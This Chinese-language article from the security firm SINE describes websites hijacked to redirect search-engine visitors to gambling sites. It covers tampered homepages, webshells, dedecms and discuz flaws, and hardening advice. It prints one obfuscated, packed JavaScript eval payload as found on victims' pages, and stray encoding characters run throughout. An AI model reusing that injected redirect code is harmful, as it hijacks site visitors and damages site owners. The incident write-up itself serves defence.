最近一段時間,我們SINE安全公司一連接到數十個公司網站被跳轉到彩票��,博彩網站上去��,客戶反映從百度搜索網站進去��,直接跳轉到彩票網站上,直接輸入網址沒有跳轉��,導致客戶網站的流量急劇下滑��,做的百度推廣跟搜狗推廣��,都給彩票網站做廣告了,公司領導高度重視網站安全的問題��,因為給公司的形象以及名譽帶來的損失太大了��,我們安排安全技術人員對其網站進行全面的網站安全檢測��,對網站存在的漏洞,以及木馬后門進行全面的清除與漏洞修復��,安全加固��。關于網站被跳轉到彩票��、博彩網站的問題,整理一份詳細的處理過程��,希望幫到更多遇到這種情況的站長��,以及公司網站運營者��。
網站被跳轉彩票網站問題分析
我們SINE安全跟公司網站負責人進行了詳細的服務器信息(服務器Ip 遠程端口 管理員賬號密碼、SSH端口��、root賬號密碼)��,網站信息包括FTp賬號密碼的對接,由安全部署部門技術對網站的代碼以及服務器系統進行縝密的安全檢測與分析��。
在整體的安全檢測當中我們發現客戶的網站都存在網站木馬后門��,包括php腳本木馬,asp腳本木馬��,jsp腳本木馬��,我們通常叫大馬,可以對網站進行惡意篡改��,上傳��,改名��,下載,等管理員的高權限操作��。出現網站被跳轉的客戶��,采用的網站架構都是php+mysql架構��,以及jsp+mysql架構,大多數用的是開源程序��,像dedecms��,織夢系統��,phpcms系統,discuz系統��。
由于之前客戶網站總是被跳轉到彩票��、賭博網站��,客戶只是懂一些簡單的代碼,只能通過篡改的首頁代碼里��,找到惡意代碼進行刪除��,但是治標不治本��,沒過幾天網站又被跳轉了,客戶經常為這些問題煩惱��,每天提心吊膽的��。其實問題的根本原因在于網站存在漏洞,以及服務器安全沒有做好。我們SINE處理了成千上百的網站��,總結的經驗來看��,網站首頁被篡改的幾率最大��,都是篡改首頁的標題,描述,以及在首頁頂部添加一些加密的字符��,如下圖所示:
北京賽車投注平臺_北京賽車pk10網上開戶_北京賽車pk10登錄平臺
以上代碼就是被攻擊者添加的加密的標題與描述��,解密后發現內容是什么北京賽車��,時時彩,pK10等賭博內容��。還有一個被攻擊的特征就是在首頁你會發現一段跳轉的代碼��,該代碼是根據搜索引擎的特征來進行判斷跳轉��,比如判斷客戶的訪問來路是通過百度搜索,360搜索,搜狗搜索來的會直接跳轉到彩票,賭博網站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('l["ec1mi8n0"]["74908"]('h2149300j38d608k05fara2149306241d6s0032q55777b13ea2pb1ci5jo1bf26gh5214930g');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
跳轉到的彩票網站如下截圖:
再一個攻擊特征就是網站在百度里搜索��,出現紅色風險標識��, 百度網址安全中心提醒您:該站點可能受到黑客攻擊��,部分頁面已被非法篡改! 紅色提示該百度風險。導致客戶打開網站直接被百度攔截��,如下圖所示:
百度網址安全中心提醒您:
該站點可能受到黑客攻擊��,部分頁面已被非法篡改��! 查看詳情
您正在訪問:http*******com/
該站點可能由于受到黑客攻擊,部分頁面已被非法篡改,可能會威脅到您的財產和信息安全,建議您謹慎訪問。
站點(******.com/)發現的非法篡改頁面��,可參考以下示例:
被黑網址快照1:********com/011E...
被黑網址快照2:********com/010S...
被黑網址快照3:********com/004G...
針對以上網站被跳轉攻擊的特征��,我們SINE對其進行全面的人工代碼安全審計��,以及網站漏洞檢測,網站木馬后門清理,發現dedecms網站存在sql注入漏洞,以及xss獲取管理員賬號cookies漏洞��,discuz存在getshell漏洞��,注入獲取管理員漏洞,discuz上傳繞過漏洞��,針對上述漏洞我們進行了全面的修復��,并做了網站安全部署��,以及服務器安全部署,網站文件防篡改部署��。
防止網站被跳轉的解決方法如下:
1.對服務器目錄權限的安全部署,對管理員賬號密碼加密,盡可能設置的復雜一些��,數字+大小寫字母+特殊符號��,對網站數據庫進行分配普通權限賬號��。
2.mysql數據庫默認端口3306,改為61116,并加入到端口安全策略,不對外開放��,外網Ip無法連接數據庫��,只有本地127.0.0.1才能進行連接數據庫��,以防止攻擊者惡意猜測。
3.對服務器底層系統進行安全加固,包括遠程端口登錄的安全驗證��。
4.對網站代碼進行整體的安全檢測��,包括定期的升級網站程序源代碼��,修復補丁以及網站漏洞。
本文來源:A5
